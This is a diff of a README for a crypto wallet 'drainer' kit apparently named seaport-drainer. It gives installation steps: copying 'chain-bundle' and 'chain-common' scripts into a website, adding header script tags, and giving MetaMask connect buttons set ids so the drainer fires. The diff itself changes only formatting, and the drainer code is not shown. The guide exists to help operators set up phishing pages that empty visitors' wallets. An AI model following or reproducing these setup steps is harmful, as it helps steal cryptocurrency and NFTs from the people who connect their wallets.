monkeydrainer/seaport-drainer/README.md

 ---

 ## `Installation Guide`
-Put the chain-bundle & chain-common script with your index.html & css or etc folders.
+Put the `chain-bundle` & `chain-common` script with your index.html & css or etc folders.

 Adding the drainer is as simple as adding header code below <header> on your site to implement the drainer.
 As-well as this you will need to add a id name to your button of id="metamaskbutton" 6 buttons are supported including:
 `metamaskbutton1 metamaskbutton2 metamaskbutton3 metamaskbutton4 metamaskbutton5`

-The header code required at the top of your html is
+The header code required at the top of your `HTML` is
 ```
 <script src="https://unpkg.com/moralis-v1@latest/dist/moralis.js" type="text/javascript"></script>
 <script src="https://code.jquery.com/jquery-3.6.0.js" crossorigin="anonymous"></script>